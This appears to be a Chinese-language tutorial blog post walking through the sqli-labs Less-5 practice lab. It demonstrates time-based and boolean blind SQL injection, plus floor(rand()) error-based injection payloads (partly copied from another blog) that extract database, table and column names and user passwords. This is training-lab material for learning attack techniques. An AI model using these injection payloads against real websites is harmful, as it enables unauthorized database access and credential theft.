一进来让我们数据id
然后???
到这来我们解释一下名词
介绍一下双查询注入,什么叫双查询注入,这个有点难以解释,通俗的来说就是嵌套子查询。我们理解一下子查询,查询的关键字是select,这个大家都知道。子查询可以简单的理解在一个select语句里还有一个select,里面的这个select语句就是子查询。
这种方法适用于注入的时候没有返回位,但是有返回位的时候也适用,不过又返回位的时候就不建议在、用这个啦!返回位就是你们union select 1,2,3,4,5,6,7,8 这里是8个字段
对于这种没有回显的 判断为盲注(时间盲注 布尔盲注)根据他博客蛇皮团团怪还有可能是报错注入。
1.时间盲注
延迟注入一般会用到下面几个函数:
sleep() //延迟函数
if(condition,true,false) //条件语句
ascii() //转换成ascii码
substring("string",strart,length)
left(string,length)
首先我们继续通过id=1,id=1’, id=1), id=1’) id=1” 发现id=1’)出错了
So 判断应该是单引号闭合
然和我们尝试sleep(5)
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and sleep(5)--+
发现有明显延迟了
发现盲注就继续想办法搞数据库名 表名 字段名。。。。一般没有人用手工 多用sqlmap,这里我们多为了学习
发现有延迟该咋办呢,用if大法强行判断,一般会累死。。。。。
我们先判断数据库长度,函数定义已经在上面给了。发现当长度是8的时候明显延迟
http://127.0.0.1:90/sqli-labs/Less-5/?id=1' and if(length(database())=8,sleep(5),1)--+
然后通过字符判断substring 开始位置是从1开始的
http://127.0.0.1:90/sqli-labs/Less-5/?id=1' and if(substring(database(),1,1)='s',sleep(5),1)--+
然后就挨个尝试吧
http://127.0.0.1:90/sqli-labs/Less-5/?id=1' and if(substring(database(),1,2)='se',sleep(5),1)--+
大约一年后………..
我们得到了库名 security
然后我们有大概通过十年的尝试挨个报出来了数据库名称*(自己写脚本或者sqlmap)
然后就通过这种方式漫长的时间后我们搞到了密码
2.布尔盲注
我们通过有无回显以及二分法判断数据库名称及表名及字段
http://127.0.0.1:90/sqli-labs/Less-5/?id=1’and substring((select database()),1,1)<’t’--+
http://127.0.0.1:90/sqli-labs/Less-5/?id=1’ and substring((select database()),1,1)>’t’--+
三,concat
之前我们在lesson1里面说过extractvalue()和updatexml()报错注入现在又发现concat
但是本来我想尝试一下concat 可惜我的mysql把我给禁了到此结束 为了本篇完整复制一波
作者:蛇皮团团怪
原文:https://blog.csdn.net/qq_41420747/article/details/81836327
爆库payload
?id=-1'union select count(*),count(*), concat('~',(select database()),'~',floor(rand()*2)) as a from information_schema.tables group by a--+
//或者
?id=-1'union select count(*),1, concat('~',(select database()),'~',floor(rand()*2)) as a from information_schema.tables group by a--+
//注意本本方法具有随机性,原理待研究
爆用户payload
?id=-1' union select count(*),1, concat('~',(select user()),'~', floor(rand()*2)) as a from information_schema.tables group by a--+
爆表名payload
?id=-1' union select count(*),1, concat('~',(select concat(table_name) from information_schema.tables where table_schema=database() limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+
修改limit x,1 可以遍历表名,找到user这个表,猜测它存放username和password
爆列名payload
?id=-1' union select count(*),1, concat('~',(select column_name from information_schema.columns where table_name='users' limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+
修改limit x,1 可以遍历列名,找到username和password列
爆字段payload
?id=-1' union select count(*),1, concat('~',(select concat_ws('[',password,username) from users limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+
修改limit x,1 可以显示第x个用户的password和username (‘[’是分隔符)
注入结束。